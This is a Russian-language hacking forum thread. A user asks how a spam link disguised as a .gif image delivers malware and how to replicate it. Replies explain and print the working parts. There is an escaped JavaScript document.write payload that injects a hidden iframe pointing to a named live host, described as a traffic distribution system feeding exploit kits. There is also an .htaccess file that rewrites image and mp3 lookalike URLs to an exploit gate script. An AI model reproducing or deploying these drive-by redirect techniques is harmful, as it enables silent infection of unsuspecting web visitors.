шо таке??? разрулите "старперы" =)

Отслеживать
b3jiom

b3jiom

RAM
Пользователь
Регистрация
16.03.2009
Сообщения
146
Реакции
0
значит пришел спам с сылкой _http://alexa-art.com/web/car.gif

объясните плиз как работает и как сделать так же???
:baby:

я как бы в теории так представляю
по ссылке грузиться трой и ифреймит на картинку.gif
или хз???

а может здесь как тута???

наш злой троянец с измененным расширением .exe на .dat).

если работает с .dat то поидеи можно сделать и хоть .куй...
т.е. например: .mp3, .mp4, .mp5(!))), .jpg, .gif, .lol, и т.д., и т.п..


з.ы. или чтото я наверно туплю :fool:
 
объясните плиз как работает и как сделать так же???
Ничего хитрого тут нет. Вместо картинки по адресу выдается обчный html (это можно сделать просто модреврайтом как у меня в статье)
Собственно в коде присутствует две составляющих:
1. Картинка, которую жертва должна долго и упорно изучать
2. Яваскрипт, который в ненавязчивой форме декодирует escape и пытается послать нас на связку в невидимом ифрейме.

Погугли на предмет
Код: 
<iframe src="http://listenz.org/stats/ru1.php" style="display:none"></iframe>
Там и так все написано уже давно. Удивительно что хост до сих пор еще жив и редиректит на разные связки :)
 
содержимое _http://alexa-art.com/web/js.js

Код: 
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006c\u0069\u0073\u0074\u0065\u006e\u007a\u002e\u006f\u0072\u0067\u002f\u0073\u0074\u0061\u0074\u0073\u002f\u0072\u0075\u0031\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')
 
содержимое _http://alexa-art.com/web/js.js
это
2. Яваскрипт, который в ненавязчивой форме декодирует escape и пытается послать нас на связку в невидимом ифрейме.
эскейп это
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006c\u0069\u0073\u0074\u0065\u006e\u007a\u002e\u006f\u0072\u0067\u002f\u0073\u0074\u0061\u0074\u0073\u002f\u0072\u0075\u0031\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')
сам ифрейм
<iframe src="http://listenz.org/stats/ru1.php" style="display:none"></iframe>
На stats/ru1.php стоит видимо TDS котоая распределяет траф между связками ибо сколько мне попадались ссылки с нее в сети, они вроде как все разные.
 
cat .htaccess:
Код: 
#<?

RewriteEngine On
RewriteBase /

RewriteRule ^phototo(.*).jpg+$ /exp/gate.php
RewriteRule ^config.php(/?)+$ /WARNING
RewriteRule ^get.file.(.*).mp3(/?)+$ /exp/gate?fr=for_$1
RewriteRule ^look.picture.([A-Z]+[0-9]+)(/?)+$ /exp/gate.php?fr=icq

#?>

банальный mod_rewrite
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх